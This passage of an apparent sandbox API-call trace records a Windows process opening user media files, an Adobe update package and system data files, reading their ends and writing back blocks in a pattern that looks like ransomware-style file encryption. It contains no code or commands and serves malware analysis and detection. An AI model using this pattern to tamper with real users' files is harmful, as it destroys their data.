(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\iFq7qSEHvHQN WmzmOe\\_ZlYUd2JJwlU_wHf\\uy 83AL3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ifq7qsehvhqn wmzmoe\\_zlyud2jjwlu_whf\\uy 83al3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.811] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.811] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x5b1e [0177.811] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.811] ReleaseMutex (hMutex=0x168) returned 1 [0177.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uy 83AL3.swf", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uy 83AL3.swf", cchWideChar=12, lpMultiByteStr=0x1f7362c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uy 83AL3.swf", lpUsedDefaultChar=0x0) returned 12 [0177.812] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.813] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4b1e [0177.813] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.813] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x4b1e [0177.813] WriteFile (in: hFile=0x1f0, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.814] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.814] WriteFile (in: hFile=0x1f0, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0177.815] CloseHandle (hObject=0x1f0) returned 1 [0177.815] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sqbgHDamn\\LLKk-wEQFUcAP.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\sqbghdamn\\llkk-weqfucap.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.816] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.816] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10825 [0177.816] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.816] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.816] ReleaseMutex (hMutex=0x168) returned 1 [0177.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LLKk-wEQFUcAP.mkv", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0177.816] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LLKk-wEQFUcAP.mkv", cchWideChar=17, lpMultiByteStr=0x1f88b2c, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LLKk-wEQFUcAP.mkv", lpUsedDefaultChar=0x0) returned 17 [0177.816] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.817] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf825 [0177.817] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.817] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0xf825 [0177.818] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.818] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0177.818] WriteFile (in: hFile=0x1f0, lpBuffer=0x2844968*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2844968*, lpNumberOfBytesWritten=0x311f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.818] CloseHandle (hObject=0x1f0) returned 1 [0177.818] CreateFileW (lpFileName="C:\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0177.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x10e3588 [0177.819] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0177.819] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.819] ReleaseMutex (hMutex=0x168) returned 1 [0177.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10110_MUI.msp", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0177.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrUpd10110_MUI.msp", cchWideChar=23, lpMultiByteStr=0x1f88b2c, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrUpd10110_MUI.msp", lpUsedDefaultChar=0x0) returned 23 [0177.819] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.820] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.820] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.820] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.821] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.821] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.821] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7ef20000 [0177.831] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.832] VirtualQuery (in: lpAddress=0x7ef80000, lpBuffer=0x311f23c, dwLength=0x1c | out: lpBuffer=0x311f23c*(BaseAddress=0x7ef80000, AllocationBase=0x7ef80000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.832] VirtualAlloc (lpAddress=0x0, dwSize=0x80000, flAllocationType=0x101000, flProtect=0x4) returned 0x7eea0000 [0177.842] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.845] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0177.847] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0177.848] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x311f23c, dwLength=0x1c | out: lpBuffer=0x311f23c*(BaseAddress=0x7ef20000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0177.848] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x2000, flProtect=0x4) returned 0x7ef20000 [0177.848] VirtualAlloc (lpAddress=0x7ef20000, dwSize=0x20000, flAllocationType=0x1000, flProtect=0x4) returned 0x7ef20000 [0177.849] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x10e1588 [0177.849] ReadFile (in: hFile=0x1f0, lpBuffer=0x2840938, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0177.849] VirtualQuery (in: lpAddress=0x7eea0000, lpBuffer=0x311f2b0, dwLength=0x1c | out: lpBuffer=0x311f2b0*(BaseAddress=0x7eea0000, AllocationBase=0x7eea0000, AllocationProtect=0x4, RegionSize=0x80000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.850] VirtualFree (lpAddress=0x7eea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.852] VirtualQuery (in: lpAddress=0x7ef20000, lpBuffer=0x311f2b0, dwLength=0x1c | out: lpBuffer=0x311f2b0*(BaseAddress=0x7ef20000, AllocationBase=0x7ef20000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0177.853] VirtualFree (lpAddress=0x7ef20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.853] CloseHandle (hObject=0x1f0) returned 1 [0178.735] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.735] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", nBufferLength=0x104, lpBuffer=0x311f694, lpFilePart=0x311f690 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png", lpFilePart=0x311f690*="background.png") returned 0x66 [0178.735] GetLastError () returned 0x5 [0178.735] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x311f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i̑폈H̑퐔H̑L̑ꩨǷ\x01") returned 0x13 [0178.735] LocalFree (hMem=0x69e2b0) returned 0x0 [0178.735] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x311d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0178.735] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x311f894) [0178.736] RtlUnwind (TargetFrame=0x311f8fc, TargetIp=0x406ffc, ExceptionRecord=0x311f378, ReturnValue=0x0) [0178.736] RtlUnwind (TargetFrame=0x311f920, TargetIp=0x407184, ExceptionRecord=0x311f378, ReturnValue=0x0) [0178.736] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{113527a4-45d4-4b6f-b567-97838f1b04b0}\\background.png")) returned 0x20 [0178.736] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\qmgr0.dat" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\qmgr0.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.737] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.737] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x400000 [0178.738] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.738] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.738] ReleaseMutex (hMutex=0x168) returned 1 [0178.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmgr0.dat", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0178.738] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="qmgr0.dat", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="qmgr0.dat", lpUsedDefaultChar=0x0) returned 9 [0178.738] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.741] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) returned 1 [0178.744] ReadFile (in: hFile=0x1f0, lpBuffer=0x2876db8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.744] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3fe000 [0178.744] ReadFile (in: hFile=0x1f0, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x311f278*=0x2000, lpOverlapped=0x0) returned 1 [0178.748] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3fe000 [0178.749] WriteFile (in: hFile=0x1f0, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x311f28c*=0x2588, lpOverlapped=0x0) returned 1 [0178.755] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0178.757] WriteFile (in: hFile=0x1f0, lpBuffer=0x2876db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0178.757] WriteFile (in: hFile=0x1f0, lpBuffer=0x2876db8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesWritten=0x311f28c*=0xf000, lpOverlapped=0x0) returned 1 [0178.758] WriteFile (in: hFile=0x1f0, lpBuffer=0x2876db8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x2876db8*, lpNumberOfBytesWritten=0x311f28c*=0x2000, lpOverlapped=0x0) returned 1 [0178.758] CloseHandle (hObject=0x1f0) returned 1 [0178.758] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6ce [0178.759] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.759] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.759] ReleaseMutex (hMutex=0x168) returned 1 [0178.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0178.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88c44, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GRAPH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0178.759] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6ce, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x311f2bc*=0x6ce, lpOverlapped=0x0) returned 1 [0178.760] CloseHandle (hObject=0x1f0) returned 1 [0178.760] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6e6 [0178.761] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.761] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.761] ReleaseMutex (hMutex=0x168) returned 1 [0178.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0178.761] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.MSPUB.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fc3c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.MSPUB.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0178.761] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6e6, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x311f2bc*=0x6e6, lpOverlapped=0x0) returned 1 [0178.762] CloseHandle (hObject=0x1f0) returned 1 [0178.762] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.SETLANG.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.setlang.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.762] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.762] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x6da [0178.763] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.763] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.763] ReleaseMutex (hMutex=0x168) returned 1 [0178.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0178.763] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.SETLANG.14.1033.hxn", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.SETLANG.14.1033.hxn", lpUsedDefaultChar=0x0) returned 22 [0178.763] ReadFile (in: hFile=0x1f0, lpBuffer=0x2663858, nNumberOfBytesToRead=0x6da, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x311f2bc*=0x6da, lpOverlapped=0x0) returned 1 [0178.764] CloseHandle (hObject=0x1f0) returned 1 [0178.764] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0178.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0178.764] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 